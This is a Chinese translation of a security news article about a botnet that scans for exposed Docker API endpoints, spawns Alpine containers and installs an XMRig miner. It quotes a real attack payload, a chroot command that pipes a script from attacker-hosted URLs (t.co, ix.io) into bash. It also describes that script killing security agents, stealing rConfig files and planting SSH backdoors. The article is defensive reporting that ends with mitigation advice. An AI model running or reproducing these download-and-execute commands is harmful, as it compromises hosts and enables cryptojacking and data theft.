黑客集团利用暴露在外的API端点劫持Docker系统

都快2020年了，不少系统管理员还是不知道把Docker管理端口收拾利索。

某黑客组织目前正在互联网上进行大规模扫描，旨在寻找各类将API暴露在公开网络之上的Docker平台。

通过扫描，黑客组织能够向这些暴露的Docker实例发出命令，从而在企业Docker实例当中部署加密货币矿工程序，最终神不知鬼不觉地利用他人算力为自己开采代币。

专业行动

本轮扫描始于今年11月24日，是周末，由于规模极为庞大，因此甫一启动即吸引到众多安全人士的关注。

Bad Pockets公司联合创始人兼首席研究官Troy Mursch在采访中表示，“Bad Packets CTI API的用户应该很了解，针对暴露Docker实例的恶意活动并不是什么新鲜事物，而且发生频率很高。”

他指出，“此次扫描的特别之处在于，其扫描规模极为夸张。单此一项，就值得我们投入精力调查攻击者到底想利用僵尸网络搞什么名堂。”

作为本轮扫描行为的发现者，Mursch表示“亦有其他关注者指出，这样的规模绝不是那种脚本小子们的儿童把戏。恶意者在此轮扫描当中投入了大量精力，而且截至目前，我们还没有彻底搞清楚对方到底想干什么。”

此次随机大规模扫描已经检测出大量公开在公共互联网上的Docker API端点。 此轮扫描利用Alpine Linux镜像创建一套容器，同时执行以下负载：

"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel

——Bad Packets Report (@bad_packets) 2019年11月25日

目前掌握的情况

截至目前，我们能够确定的是，发动攻击的集团正在扫描超过59000个IP网络（网络块）以寻找暴露的Docker实例。

在该集团发现暴露主机后，攻击者会利用该API端点启动一套Alpine Linux OS容器，进而执行以下命令：

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

以上命令用于从攻击者服务器处下载并运行一份Bash脚本。此脚本会在目标设备上安装经典的XMRRig加密货币采矿程序。Mursch指出，此次活动刚刚启动两天，黑客方面已经股票市场出14.82枚门罗币（XMR），价值约为740美元。

此外，本轮恶意行动还附带防卫机制。

Mursch在采访中指出，“虽然并非原创，但我们在活动中也观察到一种有趣的情况。攻击者通过下载自 http://ix [.]io/1XQh的脚本制裁了已知监视代理程序并关闭了大量相关进程。”

查看这份脚本，我们发现黑客不仅在尝试禁用安全产品，同时也关闭掉了LSO进程——此进程可能被其他黑客竞争对手的加密货币采矿僵尸网络（例如DDG）所利用。

此外，Mursch发现该恶意脚本还会扫描受感染主机以查找rConfig配置文件，对其进行窃取与加密，并将文件发送回黑客集团的命令与控制服务器。

Sandfly Security公司创始人Craig H. Rowland则注意到，这批黑客会在成功入侵的容器当中创建后门账户，同时保留SSH密钥以待后续访问。如此一来，他们即可通过远程位置控制所有被感染的肉鸡目标。

Mursch给出的建议是，各位运行Docker实例的用户及组织应立即检查自己是否在互联网上公开了AIP端点，如果有请立即将其关闭，而后关停一切无法识别的运行中容器。

原文链接： A hacking group is hijacking Docker systems with exposed API endpoints